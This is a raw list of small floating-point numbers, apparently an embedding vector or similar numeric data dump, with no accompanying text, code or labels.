-0.018910061568021774, 0.016160570085048676, 0.0025410852394998074, 0.001009121653623879, 0.005491669289767742, 0.01249702088534832, -0.006080323364585638, 0.022697923704981804, 0.011824272572994232, -0.0003334031789563596, 0.003541066311299801, -0.023165922611951828, 0.03208714351058006, 0.040540363639593124, -0.015195324085652828, 0.0033271764405071735, 0.002025555819272995, -0.017623066902160645, 0.012482395395636559, 0.006767696235328913, -0.018310438841581345, -0.0018363454146310687, -0.015005200169980526, 0.02146942913532257, 0.003568488173186779, 0.008767657913267612, -0.001959743443876505, 0.016964944079518318, -0.009038220159709454, -0.007297850679606199, -0.018661437556147575, 0.021498678252100945, 0.01408382784575224, -0.002672709757462144, 0.0029085371643304825, -0.01520994957536459, -0.02647116221487522, 0.039955366402864456, 0.03474888205528259, -0.0018884468590840697, -0.016350695863366127, -0.006826195865869522, -0.001554815098643303, 0.009104032069444656, 0.04010161757469177, -0.0072868820279836655, 0.00685544591397047, 0.00018852476205211133, -0.005272294860333204, 0.020738180726766586, -0.00612054206430912, 0.028679529204964638, 0.0111588379368186, 0.03454413637518883, 0.040891364216804504, -0.000007037543582555372, -0.012175272218883038, -0.0062960414215922356, 0.0163799449801445, 0.003901205724105239, 0.027465658262372017, -0.03144364431500435, -0.0041242362931370735, 0.01030327845364809, -0.014639575965702534, 0.002641631755977869, -0.0025666789151728153, -0.022098300978541374, -0.007052882574498653, 0.0005763144581578672, -0.014332451857626438, 0.01198514737188816, 0.0193195603787899, -0.015151449479162693, -0.01964130997657776, -0.025827663019299507, 0.007912098430097103, -0.011195399798452854, -0.005184545181691647, 0.007400225382298231, -0.02429204434156418, 0.009374593384563923, -0.0054039196111261845, 0.015005200169980526, 0.017608441412448883, -0.0032540515530854464, -0.028855029493570328, 0.007400225382298231, 0.004369203932583332, 0.0009259422076866031, -0.032876890152692795, -0.003999924287199974, 0.022215301170945168, 0.01741831749677658, 0.0070931012742221355, -0.0029450994916260242, 0.04048186540603638, -0.013769391924142838, 0.005371013190597296, 0.03667937591671944, -0.007122351322323084, -0.003104145871475339, -0.017432941123843193, 0.0005726582603529096, -0.04644884541630745, -0.0077731614001095295, -0.019246434792876244, -0.011699960567057133, 0.021513303741812706, 0.02793365716934204, -0.030536897480487823, -0.012175272218883038, 0.005977948661893606, -0.00023114278155844659, -0.007809723727405071, -0.0029067089781165123, -0.0024186011869460344, -0.01757919043302536, -0.01029596570879221, 0.01068352721631527, 0.048905838280916214, 0.01833968795835972, 0.00023582733410876244, 0.012789519503712654, -0.017520692199468613, 0.02129392884671688, -0.0025611945893615484, 0.02971789985895157, -0.007487975060939789, 0.023926420137286186, 0.025871537625789642, -0.015897322446107864, 0.008723783306777477, 0.01322095561772585, 0.03545088320970535, -0.00025250890757888556, -0.003999924287199974, 0.0020803993102163076, 0.021045304834842682, 0.00818997249007225, 0.008021785877645016, 0.0021242741495370865, -0.02370704524219036, 0.014273952692747116, 0.01774006523191929, 0.0001343667390756309, -0.004069392569363117, -0.0025557102635502815, 0.002603241242468357, 0.0025008665397763252, 0.019875308498740196, 0.007670786697417498, 0.025637539103627205, 0.02655891142785549, 0.00439845398068428, -0.007469693664461374, -0.006413041148334742, 0.007553787436336279, -0.0500173345208168, -0.0012367224553599954, -0.008328909985721111, 0.02196667715907097, -0.0018921029986813664, -0.00883347075432539, 0.006870070938020945, 0.010522652417421341, 0.014902825467288494, -0.034076135605573654, -0.03445638343691826, -0.0188808124512434, -0.011868148110806942, -0.014113077893853188, -0.005360044538974762, -0.009557405486702919, -0.003701940644532442, 0.047180093824863434, 0.0024533355608582497, -0.014624951407313347, -0.0015776666114106774, -0.015999697148799896, 0.004775046370923519, 0.028387030586600304, 0.014390951953828335, -0.02328292280435562, -0.025374289602041245, -0.03618212789297104, 0.013586579822003841, 0.005184545181691647, -0.006416697520762682, 0.016701694577932358, -0.03229189291596413, 0.004380173049867153, -0.012833395041525364, -0.017535315826535225, 0.005842668004333973, 0.015400073491036892, -0.023341422900557518, -0.004478891380131245, -0.006906633265316486, -0.005349075887352228, 0.006361853796988726, -0.0050675454549491405, 0.0037951748818159103, -0.008753033354878426, 0.0528838224709034, 0.01896856166422367, 0.0223176758736372, 0.003495363285765052, -0.025476664304733276, 0.012438520789146423, 0.010793213732540607, -0.0231951717287302, 0.0004460610216483474, -0.00704557029530406, -0.013908328488469124, -0.020211681723594666, -0.019275685772299767, 0.02946927584707737, -0.007678099442273378, 0.00758303701877594, 0.007308819331228733, 0.00192866544239223, -0.004917639773339033, 0.04127161204814911, -0.0064934780821204185, -0.007729286793619394, 0.014339764602482319, 0.030273647978901863, 0.0013199017848819494, 0.044518351554870605, -0.024789292365312576, 0.018719937652349472, -0.00049861945444718, -0.015663322061300278, -0.004884733818471432, -0.025140291079878807, -0.00021880297572351992, 0.0065154158510267735, 0.04056961461901665, 0.003868299536406994, 0.0007413022103719413, -0.0014259327435865998, 0.01886618696153164, -0.004957858473062515, -0.0147858252748847, -0.01189008541405201, 0.03931186720728874, 0.007919411174952984, 0.014054577797651291, -0.01137089915573597, -0.03311089053750038, -0.017520692199468613, 0.003180926898494363, -0.009155219420790672, -0.004310704302042723, -0.02765578217804432, -0.01248970814049244, -0.0020712586119771004, -0.0021315866615623236, -0.0027915374375879765, 0.009959591552615166, -0.02731940895318985, 0.008694533258676529, -0.0005982519360259175, 0.013381830416619778, -0.013374517671763897, -0.01851518824696541, -0.008672595955431461, -0.018310438841581345, -0.03246739134192467, 0.014749263413250446, 0.020899055525660515, -0.006639727856963873, -0.002738522132858634, -0.001702892710454762, -0.003277817275375128, 0.0013290424831211567, 0.0010520823998376727, -0.014975950121879578, -0.03679637610912323, -0.009550092741847038, 0.010010778903961182, 0.019758308306336403, -0.013279455713927746, -0.014844325371086597, 0.01741831749677658, 0.0011526289163157344, -0.011392837390303612, 0.04247085750102997, 0.01004002895206213, -0.036328379064798355, 0.004416735377162695, 0.0012504332698881626, 0.008628721348941326, 0.0033893324434757233, -0.01740369200706482, -0.008029098622500896, 0.0024149450473487377, -0.009147906675934792, 0.030829396098852158, -0.0004711976507678628, 0.010076591745018959, -0.030302898958325386, 0.0037421593442559242, -0.020972179248929024, -0.0017778456676751375, 0.012672520242631435, -0.008277722634375095, 0.01800331473350525, 0.007052882574498653, -0.03284763917326927, 0.0015008855843916535, 0.006628759205341339, -0.004420391283929348, -0.02164492756128311, -0.001857368741184473, -0.0061753857880830765, -0.029454652220010757, 0.028840404003858566, -0.013849828392267227, 0.01099065039306879, 0.011480586603283882, 0.00822653528302908, 0.010354465804994106, -0.002422257559373975, 0.005583074875175953, -0.0035593474749475718, -0.013637767173349857, 0.010522652417421341, -0.009323406033217907, -0.023765545338392258, -0.025359665974974632, -0.0077731614001095295, -0.007517225109040737, 0.019085561856627464, -0.01930493488907814, -0.010676214471459389, 0.016687069088220596, 0.008650658652186394, -0.003477082122117281, 0.013001581653952599, -0.009476968087255955, 0.00005190143929212354, -0.02879652939736843, -0.003138880245387554, -0.015794947743415833, 0.02351692132651806, -0.009937654249370098, 0.004497172310948372, -0.008826158009469509, -0.036328379064798355, 0.00991571694612503, 0.005996230058372021, 0.011846210807561874, -0.011773085221648216, -0.0355093814432621, 0.028460154309868813, -0.02645653672516346, -0.013915641233325005, -0.003129739547148347, -0.006047417409718037, -0.031004896387457848, 0.0044898600317537785, -0.005974292755126953, 0.005535543896257877, 0.010939463041722775, -0.006113229785114527, 0.013264830224215984, 0.0033143796026706696, -0.00018543981423135847, 0.015005200169980526, 0.010098529048264027, -0.011363587342202663, -0.004376516677439213, -0.015370823442935944, -0.01775469072163105, -0.0009433093364350498, -0.005787824280560017, 0.0012449489440768957, 0.008153410628437996, -0.009637842886149883, 0.017038067802786827, 0.0013317846460267901, 0.004892046097666025, 0.00149814342148602, -0.00916984397917986, -0.006588540505617857, 0.0008491612388752401, 0.001981680979952216, -0.02585691399872303, 0.002751318970695138, -0.005466075614094734, 0.0263834111392498, -0.006482509430497885, 0.010880963876843452, 0.007052882574498653, 0.0003779635881073773, 0.008906595408916473, -0.0387561209499836, 0.007568411994725466, -0.015049074776470661, 0.026953784748911858, 0.025652164593338966, 0.022127551957964897, 0.012299584224820137, 0.0026580849662423134, 0.00870184600353241, -0.010537276975810528, -0.007685411721467972, -0.019699810072779655, 0.01288458239287138, -0.014156952500343323, 0.00391948688775301, -0.010559214279055595, 0.013776703737676144, 0.01214602217078209, -0.014464076608419418, 0.03381288796663284, -0.009966904297471046, 0.003201036248356104, 0.01620444655418396, -0.008416659198701382, 0.04723859205842018, 0.014171577990055084, 0.006277760490775108, -0.008533659391105175, -0.026763660833239555, -0.014047265984117985, -0.0038609870243817568, 0.020533431321382523, -0.004387485329061747, -0.015458573587238789, 0.0022595550399273634, -0.010654277168214321, 0.004881077446043491, -0.009550092741847038, -0.006445947103202343, 0.0026635692920535803, 0.014837012626230717, -0.006391103845089674, -0.0012540895259007812, 0.018500562757253647, -0.00857022125273943, -0.008431284688413143, 0.021952051669359207, 0.005056576803326607, -0.013557329773902893, 0.02274179831147194, 0.009257594123482704, -0.006811570841819048, 0.01860293745994568, 0.011202712543308735, -0.017886314541101456, -0.00044217624235898256, 0.004094986245036125, 0.005615981295704842, 0.005224763881415129, -0.02145480364561081, -0.02783128246665001, 0.0080949105322361, -0.010837088339030743, 0.021601052954792976, -0.016350695863366127, -0.0020456649363040924, -0.006266791373491287, 0.0168771930038929, -0.0005653457483276725, -0.018251938745379448, -0.0033765356056392193, -0.001015520072542131, 0.011531773954629898, 0.01705269329249859, -0.004018205218017101, 0.000019995050024590455, -0.018032563850283623, -0.016175195574760437, 0.03334488719701767, 0.008277722634375095, 0.027085408568382263, -0.0011846210109069943, 0.02758265845477581, -0.020884430035948753, -0.0026014132890850306, -0.009359968826174736, 0.009469656273722649, -0.001175480429083109, 0.009579342789947987, -0.018500562757253647, 0.009235656820237637, 0.029761776328086853, -0.009425780735909939, 0.005111420527100563, 0.011173462495207787, 0.006551978178322315, -0.020825929939746857, 0.01189008541405201, 0.01038371492177248, 0.00405111163854599, -0.014500639401376247, 0.01629219576716423, -0.0036781751550734043, 0.025637539103627205, -0.002352789044380188, 0.006222916767001152, 0.012197209522128105, 0.019670559093356133, 0.013652391731739044, -0.006603165529668331, 0.0011983319418504834, -0.01297233160585165, 0.0032321142498403788, 0.014617638662457466, -0.015034450218081474, 0.016701694577932358, -0.011341650038957596, 0.02603241242468357, -0.006694571580737829, -0.026076287031173706, 0.008248472586274147, 0.008738407865166664, -0.010559214279055595, 0.014456763863563538, -0.0032668483909219503, -0.002513663377612829, -0.023911794647574425, 0.01671632006764412, -0.017886314541101456, 0.019933808594942093, -0.009623217396438122, -0.0064898221753537655, -0.020197058096528053, -0.0022394456900656223, -0.007243006955832243, 0.02774353139102459, -0.006910289637744427, 0.0017239161534234881, 0.012723707593977451, 0.010083903558552265, -0.017696190625429153, -0.012094834819436073, 0.006676290184259415, -0.0075757247395813465, -0.009469656273722649, -0.012072897516191006, 0.0021736333146691322, 0.019348809495568275, 0.005831699352711439, 0.006840820889919996, -0.012694457545876503, -0.010003466159105301, 0.00991571694612503, 0.003806143533438444, 0.010369090363383293, 0.009118656627833843, 0.01371089182794094, -0.0009807858150452375, 0.007546474691480398, -0.0005059319082647562, 0.00014305030344985425, -0.01162683591246605, 0.0005895683425478637, -0.009952278807759285, 0.00957203097641468, -0.02552053891122341, -0.01185352262109518, 0.007729286793619394, 0.008687220513820648, 0.0003466570342425257, -0.019670559093356133, 0.04021861404180527, -0.009586655534803867, 0.03843437135219574, -0.01627757027745247, -0.018383564427495003, -0.005484356544911861, -0.0020548056345432997, -0.0032193174120038748, 0.00818997249007225, -0.006043761037290096, -0.0017202598974108696, -0.014390951953828335, -0.0193195603787899, -0.008197285234928131, 0.0024204293731600046, -0.004903014749288559, -0.019261060282588005, -0.01125389989465475, -0.008650658652186394, -0.010361777618527412, 0.003469769610092044, 0.003974330611526966, 0.005670825019478798, 0.014259327203035355, -0.02078205533325672, 0.006628759205341339, -0.008299659937620163, -0.0005927675520069897, -0.000581798842176795, -0.0041754236444830894, -0.05206482484936714, -0.0077439118176698685, 0.002422257559373975, -0.010720089077949524, -0.008211909793317318, -0.008482472039759159, 0.012475083582103252, 0.016833318397402763, 0.022346924990415573, 0.017827816307544708, -0.028913527727127075, 0.002140727126970887, -0.005886542610824108, 0.02601778879761696, 0.002654428593814373, 0.0032156610395759344, -0.0028262718115001917, 0.0001351665414404124, 0.032876890152692795, -0.005553825292736292, -0.000688286789227277, -0.01601432077586651, 0.00021594655117951334, -0.004508140962570906, -0.0025282884016633034, 0.01482970081269741, -0.010573839768767357, 0.013184393756091595, 0.004365548025816679, 0.0163799449801445, -0.02404342032968998, -0.015312324278056622, -0.007228381931781769, -0.019685184583067894, -0.0009853560477495193, 0.0014734638389199972, -0.014025327749550343, -0.00045977189438417554, 0.009966904297471046, -0.018676063045859337, 0.016306821256875992, 0.007253975607454777, 0.013944891281425953, -0.0019432903500273824, 0.031326644122600555, 0.011107650585472584, -0.015487823635339737, -0.018983187153935432, -0.019772933796048164, -0.014778513461351395, 0.0027019598055630922, 0.009476968087255955, 0.003901205724105239, 0.00810222327709198, 0.012818769551813602, -0.009923029690980911, 0.003162645734846592, 0.009228344075381756, -0.01724281720817089, -0.009542780928313732, 0.01210214663296938, 0.013645078986883163, -0.011685336008667946, 0.03170689567923546, 0.014917450025677681, -0.00035351249971427023, 0.008416659198701382, -0.009030907414853573, -0.0218204278498888, -0.0022467582020908594, -0.011860835365951061, -0.017827816307544708, -0.0011407461715862155, 0.007096757646650076, 0.0032193174120038748, -0.004010892938822508, -0.0161898210644722, 0.0037183938547968864, 0.005312513560056686, 0.01578032225370407, -0.0009113172418437898, -0.018251938745379448, -0.0051443264819681644, 0.006935882847756147, 0.019100185483694077, 0.0004094986361451447, -0.014902825467288494, -0.03568487986922264, -0.0024643042124807835, 0.00977677945047617, 0.0005987089243717492, 0.007795099169015884, 0.005469731520861387, 0.000864243193063885, -0.022025177255272865, 0.018237313255667686, -0.003747643670067191, 0.006098604761064053, -0.006328947376459837, -0.00691760191693902, 0.009725592099130154, 0.005791480652987957, 0.018325064331293106, -0.012614020146429539, 0.01983143389225006, 0.017023442313075066, -0.010837088339030743, 0.016423819586634636, 0.0039560492150485516, 0.003323520068079233, -0.0034679414238780737, 0.010880963876843452, -0.003974330611526966, 0.004069392569363117, -0.005912136286497116, 0.006745758932083845, -0.008672595955431461, -0.005115076433867216, -0.006434978451579809, -0.013381830416619778, -0.010573839768767357, 0.012072897516191006, 0.018310438841581345, -0.014018015936017036, 0.013732829131186008, 0.0033308325801044703, -0.000023551312551717274, -0.004116923548281193, 0.0009204578818753362, -0.02103067934513092, -0.023824045434594154, 0.005901167634874582, 0.021147679537534714, 0.0004620570398401469, 0.011860835365951061, 0.009740217588841915, -0.013762079179286957, 0.004402110353112221, -0.012511645443737507, -0.00306027103215456, -0.020197058096528053, 0.01826656423509121, 0.015736447647213936, -0.004954202100634575, 0.012548208236694336, 0.00783897377550602, 0.011465962044894695, -0.00878959521651268, 0.0006654352764599025, -0.010317903012037277, 0.0418858602643013, 0.01112227514386177, 0.006731133908033371, 0.011063775978982449, 0.0019304935121908784, -0.016423819586634636, 0.02386792004108429, 0.02222992479801178, 0.0014798622578382492, -0.0062302290461957455, -0.015341573394834995, -0.0015904634492471814, -0.02506716549396515, 0.017827816307544708, 0.011012588627636433, 0.0023911795578897, -0.0013582922983914614, -0.00618269806727767, -0.005674480926245451, -0.0015840650303289294, -0.00472020311281085, 0.015063699334859848, 0.012065584771335125, -0.020738180726766586, -0.0016626741271466017, 0.012124084867537022, 0.015721822157502174, 0.008774970658123493, 0.004530078731477261, 0.010105840861797333, 0.007067507598549128, -0.003912174608558416, 0.017549941316246986, -0.006902976892888546, 0.0027787405997514725, -0.002038352657109499, -0.0031004897318780422, -0.0015785807045176625, 0.0016937521286308765, 0.024862416088581085, 0.021308554336428642, 0.0017714472487568855, -0.014047265984117985, 0.005966980010271072, -0.007875536568462849, 0.0020401806104928255, 0.0076927244663238525, -0.011773085221648216, -0.009462343528866768, 0.008862720802426338, 0.028299279510974884, 0.007524537388235331, -0.01374014187604189, 0.017623066902160645, -0.0232536718249321, 0.006190010346472263, 0.013023518957197666, 0.010003466159105301, -0.003051130333915353, 0.003374707419425249, 0.017111193388700485, 0.009806029498577118, -0.00618635443970561, -0.01697956770658493, -0.008753033354878426, -0.0004490317078307271, -0.005542856641113758, -0.013264830224215984, 0.02076742984354496, -0.011904709972441196, 0.007941348478198051, 0.0049761394038796425, -0.0025246322620660067, 0.012387333437800407, -0.0019707120954990387, -0.004109611269086599, -0.01578032225370407, 0.018325064331293106, 0.002879287349060178, -0.01791556552052498, 0.00041018417687155306, 0.014939387328922749, -0.025476664304733276, 0.002577647566795349, 0.01129046268761158, -0.010025404393672943, -0.026924535632133484, 0.00023674139811191708, -0.0021370709873735905, 0.0050017330795526505, -0.012029021978378296, -0.0036233316641300917, 0.005831699352711439, -0.007056538946926594, -0.00545145059004426, -0.006603165529668331, -0.010266715660691261, -0.0038207685574889183, -0.022288424894213676, -0.0013582922983914614, 0.0017860721563920379, -0.009681717492640018, 0.013550017029047012, 0.0020785711240023375, 0.01601432077586651, -0.0147858252748847, 0.0018290329026058316, 0.014544514007866383, -0.0231951717287302, -0.01680406928062439, -0.0020420087967067957, -0.00544779421761632, 0.008087597787380219, 0.03255514055490494, 0.019860683009028435, -0.000851446355227381, -0.00844590924680233, -0.01586807146668434, -0.0002531944774091244, -0.01914406195282936, -0.037966374307870865, -0.0313851460814476, 0.01089558843523264, -0.0065702591091394424, 0.004552016034722328, -0.02094293013215065, 0.0062009794637560844, 0.011261212639510632, 0.00021537525753956288, -0.006233885418623686, 0.014975950121879578, 0.004965170752257109, -0.020138558000326157, -0.013718204572796822, 0.0038792681880295277, -0.008475159294903278, 0.020445682108402252, 0.03828812390565872, -0.0028811153024435043, -0.0156925730407238, 0.00892121996730566, 0.021908177062869072, -0.0013034488074481487, -0.007553787436336279, 0.0051187328062951565, -0.0025173197500407696, 0.014902825467288494, -0.002385695232078433, 0.0016882678028196096, -0.01860293745994568, -0.019100185483694077, 0.01964130997657776, 0.010398340411484241, 0.015999697148799896, -0.004365548025816679, -0.014142327941954136, 0.0232536718249321, -0.007363663055002689, -0.010793213732540607, -0.0014707216760143638, 0.015400073491036892, 0.011838898062705994, 0.0042302669025957584, 0.002010930795222521, -0.00405111163854599, 0.022888047620654106, 0.014741950668394566, -0.015911946073174477, 0.002647116081789136, -0.014156952500343323, -0.0002429112937534228, -0.019889933988451958, -0.003709253156557679, 0.020577305927872658, 0.014522576704621315, 0.013118580915033817, -0.015253824181854725, -0.007729286793619394, 0.011392837390303612, -0.003226629924029112, -0.03156064450740814, 0.009959591552615166, 0.03524613380432129, -0.01680406928062439, 0.022449299693107605, 0.004961514845490456, -0.02164492756128311, 0.0058390116319060326, -0.005740293301641941, -0.011941272765398026, 0.0011023556580767035, -0.0016023461939767003, -0.0023491326719522476, -0.009988841600716114, -0.010135090909898281, 0.0016928380355238914, -0.015707196667790413, -0.014464076608419418, -0.009140594862401485, -0.011136900633573532, 0.011824272572994232, 0.005085826851427555, 0.009513530880212784, -0.0009689030121080577, 0.015941197052598, 0.0023107423912733793, 0.016306821256875992, 0.005338107235729694, -0.0047823591157794, 0.0002831299207173288, -0.02420429326593876, 0.023458421230316162, 0.024701543152332306, -0.012738332152366638, 0.008979720063507557, -0.00564157497137785, 0.023312171921133995, 0.010442215017974377, 0.006877383217215538, -0.009250281378626823, 0.029440026730298996, -0.00046754139475524426, 0.014427514746785164, -0.0063764788210392, -0.01335258036851883, -0.00011791366705438122, -0.004391141701489687, -0.008760346099734306, -0.017257442697882652, -0.0077439118176698685, 0.0024752728641033173, -0.0020840554498136044, -0.029674025252461433, -0.04103761166334152, 0.013381830416619778, 0.005334450863301754, 0.0029213340021669865, -0.006460572127252817, 0.03401763737201691, -0.0025941007770597935, 0.0200654324144125, -0.018134938552975655, 0.005670825019478798, -0.0029578963294625282, -0.00917715672403574, 0.025315789505839348, 0.014815075322985649, 0.008197285234928131, -0.012650582939386368, 0.014500639401376247, -0.030273647978901863, 0.007477006409317255, -0.003606878686696291, -0.0052869198843836784, -0.005630606319755316, 0.010281340219080448, 0.010178966447710991, -0.010200903750956059, 0.005751261953264475, 0.018295813351869583, 0.018208064138889313, -0.0018473141826689243, -0.004800640046596527, -0.021059930324554443, 0.0002650772512424737, 0.0012029021745547652, -0.0025886164512485266, -0.027260908856987953, 0.015268448740243912, 0.0006869156495667994, 0.006237541791051626, -0.011707273311913013, -0.00512970145791769, -0.02110380493104458, -0.016672443598508835, 0.0010831604013219476, -0.006990726571530104, -0.004760421812534332, 0.017198942601680756, 0.004138861317187548, 0.01689181849360466, 0.01784243993461132, -0.005498981568962336, 0.008043723180890083, -0.005213795229792595, -0.0010703635634854436, -0.013169768266379833, -0.015751073136925697, 0.0013007066445425153, -0.017637690529227257, -0.011941272765398026, 0.005268638487905264, -0.0035520349629223347, 0.010339840315282345, 0.004851827397942543, -0.018763812258839607, 0.0008866376592777669, -0.023312171921133995, -0.004943233449012041, 0.014237389899790287, 0.007656162139028311, -0.010529965162277222, -0.006877383217215538, -0.010237465612590313, -0.01249702088534832, -0.017944814637303352, 0.012804144993424416, 0.002396663883700967, -0.02095755562186241, -0.005491669289767742, -0.03308163955807686, 0.01774006523191929, 0.011224649846553802, 0.006811570841819048, -0.0000994610963971354, -0.01879306137561798, 0.006405728403478861, -0.018500562757253647, -0.00990840420126915, -0.01494670007377863, -0.0012586598750203848, 0.00026690535014495254, -0.002179117640480399, 0.00003839049531961791, 0.04135936126112938, -0.021089179441332817, 0.014354389160871506, -0.006317978724837303, 0.0072612883523106575, 0.0046105156652629375, 0.0034606291446834803, 0.015838822349905968, -0.006427666172385216, 0.0256960391998291, -0.019787559285759926, -0.003382019931450486, 0.0005210138624534011, -0.0031992080621421337, -0.004445984959602356, 0.009104032069444656, -0.010829776525497437, -0.01845668815076351, 0.021864302456378937, 0.003239426761865616, 0.0012431208742782474, 0.015370823442935944, -0.0011800507782027125, 0.0062960414215922356, -0.002976177493110299, -0.0028975685127079487, -0.0007179937092587352, 0.005213795229792595, 0.005806105677038431, -0.008131472393870354, 0.0014634091639891267, -0.023648545145988464, -0.003937768284231424, 0.012760269455611706, -0.007487975060939789, 0.009959591552615166, 0.004383828956633806, 0.014339764602482319, -0.0006727477302774787, -0.03267214074730873, 0.02189355157315731, 0.00818265974521637, -0.020899055525660515, 0.006336260121315718, -0.007970598526299, -0.002680022269487381, -0.002449679421260953, -0.00579879293218255, 0.0033399732783436775, -0.0218204278498888, -0.007561099715530872, 0.009857216849923134, -0.00136377674061805, -0.019714433699846268, -0.032204143702983856, -0.0004990764427930117, 0.00011431455641286448, -0.006508103106170893, -0.001375659485347569, -0.01654081977903843, -0.0044898600317537785, 0.01025940291583538, -0.0020346962846815586, -0.01990455761551857, 0.005166263785213232, -0.010186278261244297, 0.012533582746982574, 0.03591888025403023, -0.016950318589806557, 0.014895512722432613, 0.008687220513820648, -0.006208291742950678, 0.009455030784010887, 0.009740217588841915, 0.004855483770370483, -0.0029999432153999805, 0.0063216350972652435, -0.024262793362140656, 0.0024917260743677616, -0.00372753432020545, -0.020299432799220085, -0.009930341504514217, -0.021849676966667175, 0.02989340014755726, 0.01774006523191929, -0.002036524470895529, 0.00365075352601707, -0.000014639233086199965, 0.026061663404107094, -0.0014661513268947601, -0.028109155595302582, 0.03390063717961311, -0.015604822896420956, 0.004215642344206572, -0.003045646008104086, 0.005418544169515371, -0.024189669638872147, 0.004138861317187548, 0.0005488927126862109, -0.012979644350707531, -0.0013793157413601875, -0.03784937411546707, 0.011085713282227516, -0.02043105661869049, 0.017886314541101456, 0.00007146802090574056, -0.0009268563007935882, -0.017725441604852676, -0.025447415187954903, 0.0047787027433514595, -0.0073417252860963345, -0.020270181819796562, 0.004263173323124647, -0.017652316018939018, -0.004877421073615551, 0.005268638487905264, 0.007436787709593773, -0.03352038934826851, 0.0018226344836875796, 0.003817112185060978, 0.01602894626557827, 0.01262133289128542, 0.004818921443074942, -0.0011425743578001857, 0.011692648753523827, -0.007999848574399948, 0.015458573587238789, -0.01852981373667717, -0.009791404940187931, 0.018895436078310013, 0.003915830515325069, -0.006343572400510311, -0.010888275690376759, 0.026939159259200096, 0.02163030207157135, 0.020489556714892387, -0.008731096051633358, -0.002007274655625224, -0.018208064138889313, -0.011312399990856647, 0.027363283559679985, -0.0000608992122579366, 0.00379151850938797, 0.010200903750956059, -0.0043180170468986034, 0.017169693484902382, 0.0065190717577934265, 0.026836784556508064, -0.013469579629600048, 0.006603165529668331, 0.02379479631781578, 0.007656162139028311, -0.000978043652139604, -0.025491289794445038, -0.0117218978703022, 0.011144212447106838, 0.01904168725013733, -0.017637690529227257, 0.015999697148799896, 0.0074550686404109, -0.018047189339995384, -0.0053819818422198296, -0.008387409150600433, 0.0373813733458519, 0.009974217042326927, -0.02922065183520317, 0.012182584032416344, -0.0006814313237555325, 0.008146097883582115, -0.0003599109186325222, -0.0069724456407129765, -0.0264419112354517, 0.006749414838850498, -0.001575838541612029, 0.0005904823774471879, 0.009645155631005764, -0.008306972682476044, -0.021147679537534714, -0.019407309591770172, 0.00013722317817155272, 0.01030327845364809, -0.007356350310146809, 0.0016297679394483566, -0.011846210807561874, 0.01016434095799923, 0.003568488173186779, 0.009901091456413269, 0.018076440319418907, 0.022010551765561104, 0.012694457545876503, 0.0021699771750718355, -0.0019963057711720467, 0.01791556552052498, 0.0011087540769949555, 0.004208329599350691, 0.0023619295097887516, 0.0037513000424951315, 0.011568336747586727, -0.004665359389036894, 0.008263097144663334, 0.025535164400935173, -0.010954088531434536, 0.015882696956396103, 0.004080361220985651, 0.00978409219533205, -0.020884430035948753, -0.008987032808363438, 0.016847943887114525, 0.022785674780607224, 0.028504028916358948, 0.01102721318602562, 0.004756765440106392, 0.01017165370285511, 0.01210214663296938, -0.02353154681622982, -0.0188808124512434, 0.0003119227767456323, -0.01776931621134281, -0.012818769551813602, 0.006354541052132845, 0.0075757247395813465, 0.015122199431061745, 0.027377909049391747, -0.0019707120954990387, -0.009667092934250832, 0.024014169350266457, 0.006065698340535164, 0.0018043533200398088, 0.013316017575562, 0.008767657913267612, 0.0034807382617145777, 0.006014510989189148, 0.029542401432991028, -0.007184507325291634, -0.006818883586674929, 0.013798641040921211, 0.028460154309868813, 0.002296117367222905, 0.015136823989450932, -0.027217034250497818, -0.012877269648015499, -0.020153183490037918, -0.0016443929634988308, -0.004800640046596527, -0.012657894752919674, 0.007831661030650139, -0.01029596570879221, -0.007224726025015116, -0.0006823453586548567, -0.004987108521163464, 0.0052869198843836784, -0.01791556552052498, 0.0161898210644722, 0.011341650038957596, 0.0033326607663184404, 0.0016270257765427232, 0.016935693100094795, -0.01602894626557827, 0.006508103106170893, 0.0050638895481824875, -0.00023011447046883404, 0.0004067564441356808, 0.003970674239099026, -0.025374289602041245, 0.0029359590262174606, 0.026602786034345627, 0.012533582746982574, 0.02050418220460415, -0.014975950121879578, -0.0026379756163805723, 0.005272294860333204, -0.023648545145988464, 0.019027061760425568, 0.016613945364952087, 0.004420391283929348, -0.0057439496740698814, 0.0256960391998291, -0.0012358083622530103, -0.007104069925844669, 0.021176928654313087, 0.002076743170619011, 0.00041018417687155306, 0.0053783259354531765, -0.007787786424160004, 0.0050931391306221485, 0.014259327203035355, -0.0007317045819945633, -0.001105097820982337, 0.012789519503712654, -0.023590046912431717, 0.009674404747784138, -0.004771390464156866, 0.008899282664060593, 0.01507832482457161, -0.013630454428493977, 0.011904709972441196, -0.028284655883908272, -0.03682562708854675, 0.008029098622500896, 0.01357195433229208, -0.006573915481567383, 0.0014588389312848449, -0.01556094828993082, -0.00156212761066854, -0.004080361220985651, 0.0011206369381397963, -0.027114659547805786, -0.004416735377162695, 0.009323406033217907, -0.021615678444504738, 0.023663170635700226, 0.007411194033920765, 0.01469807606190443, -0.003168130060657859, 0.012614020146429539, 0.02239079959690571, -0.02016780711710453, 0.03311089053750038, -0.003930455539375544, 0.014376327395439148, -0.02233229950070381, -0.011049150489270687, -0.009469656273722649, 0.004336297977715731, 0.00570738734677434, 0.006317978724837303, -0.0046324534341692924, 0.005561137571930885, 0.017345191910862923, 0.003477082122117281, -0.00631432281807065, 0.010529965162277222, -0.012094834819436073, -0.007308819331228733, -0.01999230869114399, 0.016423819586634636, -0.012657894752919674, -0.00491032749414444, -0.01529769878834486, -0.006405728403478861, 0.007253975607454777, -0.001556643284857273, -0.009294155985116959, 0.01551707275211811, -0.0035136444494128227, 0.004851827397942543, -0.001710205222479999, 0.010069279000163078, 0.016687069088220596, -0.01249702088534832, -0.005999886430799961, -0.003890237072482705, 0.016935693100094795, -0.004080361220985651, -0.015122199431061745, 0.0036800033412873745, 0.0001238550612470135, -0.0014734638389199972, -0.014939387328922749, -0.026851410046219826, -0.016262944787740707, -0.007568411994725466, -0.008372784592211246, -0.009586655534803867, 0.013893703930079937, -0.0009661608492024243, -0.01861756294965744, 0.004961514845490456, 0.0028774591628462076, 0.01930493488907814, -0.015824196860194206, -0.01371089182794094, -0.02009468339383602, 0.016789443790912628, -0.0018866186728700995, -0.007480662316083908, 0.013264830224215984, -0.013550017029047012, 0.012672520242631435, 0.007824349217116833, -0.00299445865675807, 0.031589895486831665, 0.016511570662260056, -0.008497096598148346, -0.0017659628065302968, -0.00379151850938797, 0.008416659198701382, 0.0125043336302042, -0.005520918872207403, -0.0025593664031475782, 0.004577609710395336, -0.022712549194693565, 0.015882696956396103, 0.0020584617741405964, -0.007279569283127785, -0.011582961305975914, -0.0036452689673751593, 0.014259327203035355, 